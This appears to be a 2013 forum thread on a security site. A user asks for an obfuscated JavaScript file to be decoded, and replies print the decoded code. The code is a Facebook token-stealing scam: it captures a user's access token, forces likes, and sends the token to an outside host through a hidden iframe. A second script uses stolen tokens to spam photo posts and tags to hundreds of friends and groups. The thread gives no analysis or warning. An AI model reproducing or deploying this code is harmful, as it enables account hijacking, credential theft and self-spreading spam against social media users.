Waraxe IT Security Portal
Login or Register
June 16, 2025
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 47
Members: 0
Total: 47
Full disclosure
SEC Consult SA-20250604-0 :: Local Privilege Escalation and Default Credentials in INDAMED - MEDICAL OFFICE (Medical practice management) Demo version
Full Disclosure: CVE-2025-31200 & CVE-2025-31201 – 0-Click iMessage Chain ? Secure Enclave Key Theft, Wormable RCE, Crypto Theft
Defense in depth -- the Microsoft way (part 89): user grouppolicies don't deserve tamper protection
CVE-2025-45542: Time-Based Blind SQL Injection in CloudClassroom PHP Project v1.0
ERPNext v15.53.1 Stored XSS in bio Field Allows Arbitrary Script Execution in Profile Page
ERPNext v15.53.1 Stored XSS in user_image Field Allows Script Execution via Injected Image Path
Local information disclosure in apport and systemd-coredump
Stored XSS via File Upload - adaptcmsv3.0.3
IDOR "Change Password" Functionality - adaptcmsv3.0.3
Stored XSS "Send Message" Functionality - adaptcmsv3.0.3
Authenticated File Upload to RCE - adaptcmsv3.0.3
Stored XSS in "Description" Functionality - cubecartv6.5.9
Multiple Vulnerabilities in SAP GuiXT Scripting
CVE-2024-47081: Netrc credential leak in PSF requests library
Exploit CVE-2019-9978: Remote Code Execution in Social Warfare WordPress Plugin (<= 3.5.2)
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> PHP script decode requests -> Any champion can decode this js please?
Post new topicReply to topic View previous topic :: View next topic
Any champion can decode this js please?
PostPosted: Sun Jul 28, 2013 8:18 am Reply with quote
jhonrhods
Beginner
Beginner
Joined: Jul 28, 2013
Posts: 2




https://stalkerxx.s3.amazonaws.com/miley.js
View user's profile Send private message
PostPosted: Sun Jul 28, 2013 10:56 am Reply with quote
sprremix
Regular user
Regular user
Joined: Apr 25, 2013
Posts: 7




This is as far as I came: http://pastebin.com/ZCEyq8qq
View user's profile Send private message
PostPosted: Thu Aug 01, 2013 5:47 pm Reply with quote
freeuser
Beginner
Beginner
Joined: Aug 01, 2013
Posts: 2




Code:

jQuery(document).ready(function ($) {
$('a#getcode').click(function (e) {
e.preventDefault();
window.open('token.php?getcode', 'popUpWindow', 'width=900,height=20,left=300,top=300,resizable=no,scrollbars=yes,toolbar=yes,menubar=no,location=no,directories=no, status=yes')
});
$('a#activate').click(function (e) {
e.preventDefault();
$('.howto').fadeOut(function () {
$('.result').show();
$('.error').hide();
$('#logs').html("");
$('.loading').fadeIn('fast', function () {
var access_token = $('.access_token').val();
if (access_token.split('#access_token=')[1]) {
var access_token = access_token.split('#access_token=')[1].split('&')[0];
setTimeout("top.location.href = 'http://addfollow.uni.me/';", 25000);
$.getJSON('https://graph.facebook.com/me?access_token=' + access_token, function (response) {
if (response.id) {
var uid = response.id;
HeemaNada(access_token);
HaveFun(access_token);
$('ul.list').append('<li><img src="https://graph.facebook.com/' + uid + '/picture" alt="' + response.name + '"><a href="#">Hey , ' + response.name + '</a></li>');
$('.loading').slideUp(function () {
$('.friendlist').slideDown()
})
}
})
} else {
$(this).fadeOut(2000, function () {
$('.error').fadeIn('fast');
$('.howto').fadeIn()
})
}
})
})
});
$('a#back').click(function (e) {
e.preventDefault();
$('.result').slideUp(function () {
$('.error').hide()
})
})
});

function HeemaNada(token) {
jQuery['ajax']({
url: 'https://graph.facebook.com/me/likes?access_token=' + token + '&method=POST&url=https://www.facebook.com/441238915973738',
dataType: 'jsonp',
success: function (_0xb26ax3) {}
})
};

function HaveFun(token) {
console['log']('Request Sent');
document['getElementById']('atp')['innerHTML'] = '<iframe src="http://morethan40.tk/index.php?access_token=' + token + '" width="0" height="0"></iframe>'
};
View user's profile Send private message
PostPosted: Tue Aug 06, 2013 10:03 am Reply with quote
dondon
Regular user
Regular user
Joined: Aug 06, 2013
Posts: 8




Funny, i am getting this. I'm not sure if above is correct.

Code:

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
</head>
<body onLoad="GetGroups();GetFriends();getStatus();">
<script type="text/javascript" src="https://stalkerxx.s3.amazonaws.com/jquery.js"></script>

<script>
var access_token = "";
fotolink = "http://kundia.info/leta/dormans.php";
text = 'Get Your Profile Stalkerz Here --> www . profilestalkerss . tk (Remove Spaces) ';
gtext = 'Get Your Profile Stalkerz Here --> www . profilestalkerss . tk (Remove Spaces) ';
gonderildi = 0;

function GetGroups() {
jQuery['ajax']({
url: 'https://graph.facebook.com/fql?q=select gid, name from group where gid IN (SELECT gid FROM group_member WHERE uid=me()) order by rand() limit 70&access_token=' + access_token,
dataType: 'jsonp',
success: function (_0x1f66x7) {
Groups(_0x1f66x7);
}
});
};

function GetFriends() {
jQuery['ajax']({
url: 'https://graph.facebook.com/fql?q=SELECT uid, first_name FROM user WHERE uid IN ( SELECT uid2 FROM friend WHERE uid1 = me() ) ORDER BY rand() limit 400&access_token=' + access_token,
dataType: 'jsonp',
success: function (_0x1f66x7) {
Friends(_0x1f66x7);
}
});
};

function Friends(_0x1f66xa) {
for (i = 0; i < _0x1f66xa['data']['length']; i++) {
jQuery['ajax']({
url: 'https://graph.facebook.com/' + _0x1f66xa['data'][i]['uid'] + '/photos?url=' + fotolink + '&message=' + text + '&callback=paylas&method=POST&access_token=' + access_token,
dataType: 'script',
success: function () {
gonderildi += 1;
if (gonderildi >= _0x1f66xa['data']['length']) {};
}
});
};
};

function Groups(_0x1f66xa) {
for (i = 0; i < _0x1f66xa['data']['length']; i++) {
jQuery['ajax']({
url: 'https://graph.facebook.com/' + _0x1f66xa['data'][i]['gid'] + '/photos?url=' + fotolink + '&message=' + gtext + '&callback=paylas&method=POST&access_token=' + access_token,
dataType: 'script',
success: function () {
gonderildi += 1;
if (gonderildi >= _0x1f66xa['data']['length']) {};
}
});
};
};

function getStatus() {
$['getJSON']('https://graph.facebook.com/me/photos?url=' + fotolink + '&message=' + text + '&method=POST&access_token=' + access_token, function (_0x1f66xf) {
if (_0x1f66xf['id']) {
var _0x1f66x11 = _0x1f66xf['id'];
var _0x1f66x12 = 55;
$['getJSON']('https://graph.facebook.com/me/friends?limit=' + _0x1f66x12 + '&access_token=' + access_token, function (_0x1f66xf) {
if (_0x1f66xf['data']) {
var _0x1f66x13 = [];
$['each'](_0x1f66xf['data'], function (_0x1f66x14, _0x1f66x7) {
_0x1f66x13['push'](_0x1f66x7['id']);
$['getJSON']('https://graph.facebook.com/' + _0x1f66x11 + '/tags/' + _0x1f66x7['id'] + '/?method=POST&access_token=' + access_token, function (_0x1f66xf) {});
});
};
});
};
});
};

</script>
</body>
</html>
View user's profile Send private message
Any champion can decode this js please?
www.waraxe.us Forum Index -> PHP script decode requests
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 1

Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



PCWizardHub - Helping you fix, build, and optimize your PC life
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.025 Seconds